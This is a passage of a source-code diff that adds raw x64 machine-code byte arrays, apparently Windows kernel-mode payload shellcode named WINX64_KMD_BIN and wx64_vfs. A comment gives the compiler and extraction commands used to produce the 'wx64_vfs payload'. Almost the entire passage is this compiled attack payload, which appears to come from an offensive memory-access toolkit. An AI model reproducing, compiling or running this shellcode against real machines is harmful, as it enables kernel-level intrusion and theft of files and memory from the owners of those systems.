+ 0x89, 0x78, 0x18, 0x55, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
+ 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0xa0, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0xda, 0x48, 0x8b, 0xf1, 0xba, 0xf9, 0xbe, 0xdd, 0x05, 0xe8, 0x89,
+ 0xfe, 0xff, 0xff, 0xba, 0xc9, 0xc5, 0x6e, 0x6c, 0x48, 0x8b, 0xce, 0x4c,
+ 0x8b, 0xf8, 0xe8, 0x79, 0xfe, 0xff, 0xff, 0xba, 0x57, 0x63, 0x32, 0x5a,
+ 0x48, 0x8b, 0xce, 0x4c, 0x8b, 0xe0, 0xe8, 0x69, 0xfe, 0xff, 0xff, 0xba,
+ 0xdb, 0x4f, 0x3d, 0xc5, 0x48, 0x8b, 0xce, 0x4c, 0x8b, 0xe8, 0xe8, 0x59,
+ 0xfe, 0xff, 0xff, 0x45, 0x33, 0xc0, 0xba, 0x00, 0x10, 0x00, 0x00, 0xb9,
+ 0x00, 0x30, 0x00, 0x00, 0x4c, 0x8b, 0xf0, 0x41, 0xff, 0xd7, 0x48, 0x8b,
+ 0xf8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x03, 0x01, 0x00, 0x00, 0xba, 0x00,
+ 0x10, 0x00, 0x00, 0x48, 0x8b, 0xc8, 0x41, 0xff, 0xd6, 0x48, 0x89, 0x77,
+ 0x08, 0x4c, 0x8d, 0xb7, 0x58, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x47, 0x50,
+ 0x01, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x75, 0xe3, 0x48, 0xb8, 0x77, 0x33,
+ 0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0xc7, 0x45, 0xb7, 0x1f, 0x9d, 0x48,
+ 0x9d, 0x48, 0x89, 0x07, 0x48, 0x8b, 0xd3, 0x8b, 0x4b, 0x08, 0x8b, 0x43,
+ 0x0c, 0x48, 0x2b, 0xd1, 0x48, 0x03, 0xc2, 0xc7, 0x45, 0xbb, 0x92, 0xf5,
+ 0x45, 0x13, 0x48, 0x89, 0x47, 0x58, 0x8b, 0x43, 0x10, 0x48, 0x03, 0xc2,
+ 0xc7, 0x45, 0xbf, 0xbc, 0x1e, 0x36, 0x9f, 0x48, 0x89, 0x47, 0x60, 0x8b,
+ 0x43, 0x14, 0xbb, 0x0b, 0x00, 0x00, 0x00, 0x48, 0x03, 0xc2, 0xc7, 0x45,
+ 0xc3, 0x57, 0x63, 0x32, 0x5a, 0x48, 0x89, 0x47, 0x68, 0xc7, 0x45, 0xc7,
+ 0x6f, 0xa5, 0x77, 0x49, 0xc7, 0x45, 0xcb, 0xf9, 0xbe, 0xdd, 0x05, 0xc7,
+ 0x45, 0xcf, 0xc9, 0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0xd3, 0x02, 0x6b, 0xa0,
+ 0x94, 0xc7, 0x45, 0xd7, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0xdb, 0x89,
+ 0x4d, 0x3f, 0xbc, 0xc7, 0x45, 0xdf, 0x92, 0x6d, 0x58, 0x58, 0x48, 0x8b,
+ 0x4f, 0x08, 0x48, 0x8d, 0x76, 0xfc, 0x8b, 0x16, 0x4d, 0x8d, 0x76, 0xf8,
+ 0xe8, 0x7f, 0xfd, 0xff, 0xff, 0x49, 0x89, 0x06, 0x83, 0xc3, 0xff, 0x75,
+ 0xe5, 0xbe, 0x00, 0x10, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x8b, 0xd6, 0x8b,
+ 0xce, 0x41, 0xff, 0xd7, 0x48, 0x8b, 0xcf, 0x48, 0x8b, 0xd8, 0x41, 0xff,
+ 0xd5, 0x48, 0x89, 0x83, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xd6, 0x48, 0xb8,
+ 0x77, 0x33, 0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0x48, 0x8b, 0xcb, 0x48,
+ 0x89, 0x83, 0xb0, 0x00, 0x00, 0x00, 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xcf,
+ 0xe8, 0x23, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xa0, 0x00, 0x00,
+ 0x00, 0x49, 0x8b, 0x5b, 0x30, 0x49, 0x8b, 0x73, 0x38, 0x49, 0x8b, 0x7b,
+ 0x40, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c,
+ 0x5d, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c,
+ 0x24, 0x18, 0x56, 0x57, 0x41, 0x56, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
+ 0xd9, 0x48, 0xc7, 0x44, 0x24, 0x40, 0xf0, 0xd8, 0xff, 0xff, 0xb9, 0x00,
+ 0x00, 0x00, 0x01, 0x41, 0xbe, 0xff, 0xff, 0xff, 0xff, 0x33, 0xed, 0x41,
+ 0x8b, 0xd6, 0x8b, 0xf5, 0x48, 0x89, 0x4b, 0x18, 0xff, 0x93, 0x10, 0x03,
+ 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x2c, 0xb9, 0x00,
+ 0x00, 0x40, 0x00, 0x41, 0x8b, 0xd6, 0x48, 0x89, 0x4b, 0x18, 0xff, 0x93,
+ 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x12,
+ 0xb8, 0x01, 0x00, 0x00, 0xf0, 0x48, 0x89, 0x6b, 0x18, 0x48, 0x89, 0x43,
+ 0x30, 0xe9, 0xae, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0x48, 0x89, 0x7b,
+ 0x28, 0xff, 0x93, 0x18, 0x03, 0x00, 0x00, 0x48, 0x89, 0x43, 0x20, 0x41,
+ 0xbe, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x83, 0xf8, 0x0f, 0x00, 0x00,
+ 0x4c, 0x89, 0x73, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x23, 0x49, 0x03, 0xf6,
+ 0x48, 0xb8, 0x00, 0xe4, 0x0b, 0x54, 0x02, 0x00, 0x00, 0x00, 0x48, 0x3b,
+ 0xf0, 0x76, 0xde, 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x33, 0xd2, 0x33, 0xc9,
+ 0xff, 0x93, 0x50, 0x03, 0x00, 0x00, 0xeb, 0xcd, 0x48, 0xc7, 0x43, 0x30,
+ 0x02, 0x00, 0x00, 0x00, 0x48, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x2a, 0x01,
+ 0x00, 0x00, 0x48, 0x83, 0xf8, 0x04, 0x75, 0x4c, 0xff, 0x93, 0x20, 0x03,
+ 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x06, 0x48, 0x89,
+ 0x6b, 0x38, 0xeb, 0x38, 0x4c, 0x8b, 0xc5, 0x48, 0x39, 0x28, 0x75, 0x06,
+ 0x48, 0x39, 0x68, 0x08, 0x74, 0x09, 0x4d, 0x03, 0xc6, 0x48, 0x83, 0xc0,
+ 0x10, 0xeb, 0xec, 0x49, 0xc1, 0xe0, 0x04, 0x48, 0x8b, 0xd6, 0x48, 0x8b,
+ 0xcf, 0x4c, 0x89, 0x43, 0x48, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x48,
+ 0x8b, 0xce, 0xff, 0x93, 0x00, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73, 0x38,
+ 0x48, 0x83, 0xbb, 0xf8, 0x0f, 0x00, 0x00, 0x05, 0x75, 0x18, 0x48, 0x8b,
+ 0xcb, 0x48, 0x39, 0xab, 0x68, 0x01, 0x00, 0x00, 0x74, 0x05, 0xff, 0x53,
+ 0x60, 0xeb, 0x03, 0xff, 0x53, 0x58, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x8b,
+ 0x83, 0xf8, 0x0f, 0x00, 0x00, 0x49, 0x2b, 0xc6, 0x49, 0x3b, 0xc6, 0x77,
+ 0x5a, 0x48, 0x39, 0xab, 0x68, 0x01, 0x00, 0x00, 0x74, 0x4d, 0x48, 0x8b,
+ 0x53, 0x48, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0x4b, 0x40, 0xff, 0x93, 0x28,
+ 0x03, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x74, 0x34, 0x4c,
+ 0x8b, 0x43, 0x48, 0x4c, 0x39, 0xb3, 0xf8, 0x0f, 0x00, 0x00, 0x75, 0x08,
+ 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcf, 0xeb, 0x06, 0x48, 0x8b, 0xd7, 0x48,
+ 0x8b, 0xce, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x53, 0x48,
+ 0x48, 0x8b, 0xce, 0xff, 0x93, 0x30, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73,
+ 0x38, 0xeb, 0x04, 0x48, 0x89, 0x6b, 0x38, 0x48, 0x83, 0xbb, 0xf8, 0x0f,
+ 0x00, 0x00, 0x06, 0x75, 0x15, 0x4c, 0x8b, 0x43, 0x48, 0x48, 0x8b, 0xcf,
+ 0x48, 0x8b, 0x53, 0x40, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x4c, 0x89,
+ 0x73, 0x38, 0x48, 0x83, 0xbb, 0xf8, 0x0f, 0x00, 0x00, 0x07, 0x75, 0x15,
+ 0x4c, 0x8b, 0x43, 0x48, 0x48, 0x8b, 0xd7, 0x48, 0x8b, 0x4b, 0x40, 0xff,
+ 0x93, 0x40, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x89, 0xab,
+ 0xf8, 0x0f, 0x00, 0x00, 0x48, 0x8b, 0xf5, 0xe9, 0x91, 0xfe, 0xff, 0xff,
+ 0xb8, 0x00, 0x00, 0x00, 0xf0, 0x48, 0x8b, 0xcf, 0x48, 0x89, 0x43, 0x30,
+ 0xff, 0x93, 0x08, 0x03, 0x00, 0x00, 0x48, 0x89, 0x6b, 0x20, 0x48, 0x89,
+ 0x6b, 0x28, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x89, 0x2b, 0x48, 0x89, 0xab,
+ 0xf8, 0x0f, 0x00, 0x00, 0x48, 0x8b, 0x5c, 0x24, 0x48, 0x48, 0x8b, 0x6c,
+ 0x24, 0x50, 0x48, 0x83, 0xc4, 0x20, 0x41, 0x5e, 0x5f, 0x5e, 0xc3
+ };
+ *ppb = WINX64_KMD_BIN;
+ *pcb = sizeof(WINX64_KMD_BIN);
+}
+
+// standard wx64_vfs payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_vfs.c
+// ml64 wx64_common_a.asm /Fewx64_vfs.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_vfs.obj wx64_common.obj
+// shellcode64.exe -o wx64_vfs.exe
+// xxd -i wx64_vfs.bin
+VOID GetData_VFS(PBYTE *ppb, PDWORD pcb)
+{
+ BYTE WINX64_VFS_BIN[] = {
+ 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20,
+ 0xe8, 0xb7, 0x06, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3, 0x0f, 0x20,
+ 0xd8, 0xc3, 0x0f, 0x09, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+ 0x08, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x55, 0x48, 0x8d, 0x6c, 0x24, 0xa9,
+ 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00,
+ 0x48, 0x8d, 0x4d, 0x17, 0x48, 0x8b, 0xfa, 0x49, 0x8b, 0xd8, 0xba, 0x10,
+ 0x00, 0x00, 0x00, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0xba, 0x30, 0x00,
+ 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x27, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
+ 0x48, 0x8d, 0x93, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff,
+ 0x57, 0x78, 0x83, 0x64, 0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48,
+ 0x83, 0x64, 0x24, 0x48, 0x00, 0x4c, 0x8d, 0x4d, 0x17, 0x48, 0x83, 0x65,
+ 0x2f, 0x00, 0x4c, 0x8d, 0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00,
+ 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x6f, 0x48, 0x89, 0x45, 0x37, 0x0f, 0x57,
+ 0xc0, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x27, 0x30, 0x00,
+ 0x00, 0x00, 0x89, 0x44, 0x24, 0x38, 0xba, 0x00, 0x00, 0x00, 0x80, 0x89,
+ 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48,
+ 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0xc7, 0x45, 0x3f, 0x40, 0x02, 0x00,
+ 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x47, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00,
+ 0x48, 0x8b, 0x4d, 0x6f, 0x8b, 0xd8, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff,
+ 0x97, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00,
+ 0x00, 0x8b, 0xc3, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x7b, 0x20, 0x49,
+ 0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x7c,
+ 0x24, 0x18, 0x55, 0x48, 0x8d, 0x6c, 0x24, 0xa9, 0x48, 0x81, 0xec, 0xb0,
+ 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00, 0x48, 0x8d, 0x4d, 0x17,
+ 0x48, 0x8b, 0xfa, 0x49, 0x8b, 0xd8, 0xba, 0x10, 0x00, 0x00, 0x00, 0xff,
+ 0x97, 0x80, 0x00, 0x00, 0x00, 0xba, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x4d, 0x27, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0x1c,
+ 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x57, 0x78, 0x83, 0x64,
+ 0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x83, 0x64, 0x24, 0x48,
+ 0x00, 0x4c, 0x8d, 0x4d, 0x17, 0x48, 0x83, 0x65, 0x2f, 0x00, 0x4c, 0x8d,
+ 0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x10, 0x00, 0x00, 0x48, 0x8d,
+ 0x4d, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x57,
+ 0xc0, 0xc7, 0x44, 0x24, 0x30, 0x04, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
+ 0x00, 0x40, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83,
+ 0x64, 0x24, 0x20, 0x00, 0x48, 0xc7, 0x45, 0x27, 0x30, 0x00, 0x00, 0x00,
+ 0x48, 0xc7, 0x45, 0x3f, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0x37,
+ 0xf3, 0x0f, 0x7f, 0x45, 0x47, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0x4d, 0x6f, 0x8b, 0xd8, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97,
+ 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00,
+ 0x8b, 0xc3, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x7b, 0x20, 0x49, 0x8b,
+ 0xe3, 0x5d, 0xc3, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x55, 0x41, 0x54, 0x41, 0x55,
+ 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0xb0,
+ 0x00, 0x00, 0x00, 0x33, 0xc0, 0x48, 0x8b, 0xd9, 0x48, 0x8b, 0x89, 0x10,
+ 0x02, 0x00, 0x00, 0x49, 0x8b, 0xf8, 0x48, 0x89, 0x45, 0x67, 0x4c, 0x8b,
+ 0xfa, 0x44, 0x8b, 0xf0, 0x48, 0x81, 0xf9, 0x00, 0x00, 0x20, 0x00, 0x73,
+ 0x0a, 0xb8, 0x07, 0x00, 0x00, 0xf0, 0xe9, 0xd5, 0x01, 0x00, 0x00, 0x4c,
+ 0x8b, 0x63, 0x28, 0x48, 0x81, 0xc1, 0x00, 0x00, 0xf0, 0xff, 0x4c, 0x03,
+ 0xa3, 0x08, 0x02, 0x00, 0x00, 0x48, 0xb8, 0x8f, 0xe3, 0x38, 0x8e, 0xe3,
+ 0x38, 0x8e, 0xe3, 0x48, 0xf7, 0xe1, 0x48, 0x8d, 0x4d, 0xe7, 0x4c, 0x8b,
+ 0xea, 0xba, 0x10, 0x00, 0x00, 0x00, 0x49, 0xc1, 0xed, 0x09, 0x41, 0xff,
+ 0x97, 0x80, 0x00, 0x00, 0x00, 0xbe, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x4d, 0x07, 0x8b, 0xd6, 0x41, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48,
+ 0x8d, 0x97, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xf7, 0x41, 0xff,
+ 0x57, 0x78, 0x4c, 0x21, 0x75, 0x0f, 0x48, 0x8d, 0x45, 0xf7, 0x0f, 0x57,
+ 0xc0, 0xc7, 0x44, 0x24, 0x28, 0x21, 0x40, 0x00, 0x00, 0x4c, 0x8d, 0x4d,
+ 0xe7, 0x48, 0x89, 0x45, 0x17, 0x4c, 0x8d, 0x45, 0x07, 0x48, 0x89, 0x75,
+ 0x07, 0xba, 0x01, 0x00, 0x10, 0x00, 0x48, 0xc7, 0x45, 0x1f, 0x40, 0x02,
+ 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x67, 0xc7, 0x44, 0x24, 0x20, 0x03, 0x00,
+ 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x27, 0x41, 0xff, 0x97, 0x98, 0x00,
+ 0x00, 0x00, 0x33, 0xd2, 0x8b, 0xf8, 0x85, 0xc0, 0x0f, 0x85, 0x01, 0x01,
+ 0x00, 0x00, 0xc6, 0x44, 0x24, 0x50, 0x01, 0xe9, 0x96, 0x00, 0x00, 0x00,
+ 0x48, 0x39, 0x55, 0xef, 0x0f, 0x84, 0xed, 0x00, 0x00, 0x00, 0xba, 0x40,
+ 0x02, 0x00, 0x00, 0x49, 0x8b, 0xcc, 0x41, 0xff, 0x97, 0x80, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0x46, 0x28, 0x48, 0x8d, 0x56, 0x5e, 0x49, 0x89, 0x44,
+ 0x24, 0x30, 0x48, 0x8b, 0x46, 0x10, 0x49, 0x89, 0x44, 0x24, 0x08, 0x48,
+ 0x8b, 0x46, 0x08, 0x49, 0x89, 0x44, 0x24, 0x18, 0x48, 0x8b, 0x46, 0x20,
+ 0x49, 0x83, 0x0c, 0x24, 0x10, 0x49, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x46,
+ 0x38, 0x24, 0x10, 0xf6, 0xd8, 0x48, 0x1b, 0xc9, 0x48, 0xf7, 0xd9, 0x48,
+ 0xff, 0xc1, 0x49, 0x09, 0x0c, 0x24, 0xb9, 0x03, 0x01, 0x00, 0x00, 0x8b,
+ 0x46, 0x3c, 0x3b, 0xc1, 0x0f, 0x47, 0xc1, 0x49, 0x8d, 0x4c, 0x24, 0x38,
+ 0x44, 0x8b, 0xc0, 0x41, 0xff, 0x57, 0x60, 0x33, 0xd2, 0x49, 0x81, 0xc4,
+ 0x40, 0x02, 0x00, 0x00, 0x49, 0xff, 0xc6, 0x4d, 0x3b, 0xf5, 0x73, 0x73,
+ 0x8b, 0x06, 0x85, 0xc0, 0x74, 0x08, 0x48, 0x03, 0xf0, 0xe9, 0x78, 0xff,
+ 0xff, 0xff, 0x88, 0x54, 0x24, 0x50, 0x48, 0x8b, 0x4b, 0x28, 0x48, 0x8d,
+ 0x45, 0xe7, 0x48, 0x03, 0x8b, 0x10, 0x02, 0x00, 0x00, 0x45, 0x33, 0xc9,
+ 0x48, 0x8b, 0xb3, 0x08, 0x02, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x48, 0x89,
+ 0x54, 0x24, 0x48, 0x48, 0x81, 0xc6, 0x00, 0x00, 0xf0, 0xff, 0x88, 0x54,
+ 0x24, 0x40, 0x48, 0x03, 0xf1, 0x48, 0x8b, 0x4d, 0x67, 0x48, 0xc7, 0x44,
+ 0x24, 0x38, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00,
+ 0x10, 0x00, 0x48, 0x89, 0x74, 0x24, 0x28, 0x48, 0x89, 0x44, 0x24, 0x20,
+ 0x41, 0xff, 0x97, 0xa0, 0x00, 0x00, 0x00, 0x33, 0xd2, 0x8b, 0xf8, 0x85,
+ 0xc0, 0x0f, 0x84, 0x09, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x4d, 0x67, 0x4b,
+ 0x8d, 0x04, 0xf6, 0x48, 0xc1, 0xe0, 0x06, 0x48, 0x89, 0x83, 0x00, 0x02,
+ 0x00, 0x00, 0x48, 0x85, 0xc9, 0x74, 0x09, 0x41, 0xff, 0x97, 0x88, 0x00,
+ 0x00, 0x00, 0x33, 0xd2, 0x4d, 0x85, 0xf6, 0x0f, 0x45, 0xfa, 0x8b, 0xc7,
+ 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x38,
+ 0x49, 0x8b, 0x73, 0x40, 0x49, 0x8b, 0x7b, 0x48, 0x49, 0x8b, 0xe3, 0x41,
+ 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x18, 0x55, 0x57,
+ 0x41, 0x56, 0x48, 0x8d, 0x6c, 0x24, 0xb9, 0x48, 0x81, 0xec, 0xb0, 0x00,
+ 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+ 0xf1, 0xbb, 0x30, 0x00, 0x00, 0x00, 0x8b, 0xd3, 0x48, 0x8d, 0x4d, 0x17,
+ 0x4d, 0x8b, 0xf0, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x53, 0xe0,
+ 0x48, 0x8d, 0x4d, 0xf7, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x49, 0x8d,
+ 0x96, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x57, 0x78,
+ 0x83, 0x64, 0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x83, 0x64,
+ 0x24, 0x48, 0x00, 0x4c, 0x8d, 0x4d, 0xf7, 0x48, 0x83, 0x65, 0x1f, 0x00,
+ 0x4c, 0x8d, 0x45, 0x17, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00, 0x00, 0x00,
+ 0x48, 0x8d, 0x4d, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x01, 0x00, 0x00, 0x00,
+ 0x0f, 0x57, 0xc0, 0xc7, 0x44, 0x24, 0x30, 0x03, 0x00, 0x00, 0x00, 0xba,
+ 0x00, 0x00, 0x00, 0x80, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00,
+ 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0x89, 0x5d, 0x17, 0x48, 0xc7,
+ 0x45, 0x2f, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0x27, 0xf3, 0x0f,
+ 0x7f, 0x45, 0x37, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85,
+ 0xc0, 0x75, 0x59, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00, 0x49, 0x8d, 0x86,
+ 0x28, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x8e, 0x08, 0x02, 0x00, 0x00, 0x45,
+ 0x33, 0xc9, 0x48, 0x03, 0x4e, 0x28, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x44,
+ 0x24, 0x38, 0x33, 0xd2, 0x41, 0x8b, 0x86, 0x30, 0x03, 0x00, 0x00, 0x89,
+ 0x44, 0x24, 0x30, 0x48, 0x8d, 0x45, 0xf7, 0x48, 0x89, 0x4c, 0x24, 0x28,
+ 0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x97, 0xb8,
+ 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75, 0x0b, 0x48, 0x8b, 0x45,
+ 0xff, 0x48, 0x89, 0x86, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x6f,
+ 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x4c,
+ 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0xc3, 0x49, 0x8b, 0x5b,
+ 0x20, 0x49, 0x8b, 0x73, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5e, 0x5f, 0x5d,
+ 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1,
+ 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00,
+ 0x48, 0x8d, 0x4d, 0x27, 0x48, 0x8b, 0xf2, 0xbf, 0x30, 0x00, 0x00, 0x00,
+ 0x8b, 0xd7, 0x49, 0x8b, 0xd8, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x8d,
+ 0x57, 0xe0, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00,
+ 0x48, 0x8d, 0x93, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x17, 0xff,
+ 0x56, 0x78, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x8d, 0x45, 0x17, 0x48, 0x83,
+ 0x65, 0x2f, 0x00, 0x0f, 0x57, 0xc0, 0x48, 0x89, 0x45, 0x37, 0x8a, 0xc1,
+ 0x24, 0x80, 0x48, 0x89, 0x7d, 0x27, 0xf6, 0xd8, 0x48, 0xc7, 0x45, 0x3f,
+ 0x40, 0x02, 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x47, 0x1b, 0xd2, 0x81,
+ 0xe2, 0x04, 0x00, 0x00, 0xc0, 0x81, 0xc2, 0x00, 0x00, 0x00, 0x40, 0xf6,
+ 0xc1, 0x40, 0x74, 0x0d, 0x48, 0x83, 0xbb, 0x28, 0x03, 0x00, 0x00, 0x00,
+ 0x8d, 0x47, 0xd5, 0x74, 0x05, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x83, 0x64,
+ 0x24, 0x50, 0x00, 0x4c, 0x8d, 0x4d, 0x07, 0x48, 0x83, 0x64, 0x24, 0x48,
+ 0x00, 0x4c, 0x8d, 0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00, 0x00,
+ 0x00, 0x48, 0x8d, 0x4d, 0x6f, 0x89, 0x44, 0x24, 0x38, 0x83, 0x64, 0x24,
+ 0x30, 0x00, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83,
+ 0x64, 0x24, 0x20, 0x00, 0xff, 0x96, 0x90, 0x00, 0x00, 0x00, 0x8b, 0xf8,
+ 0x85, 0xc0, 0x75, 0x45, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00, 0x48, 0x8d,
+ 0x83, 0x28, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8d,
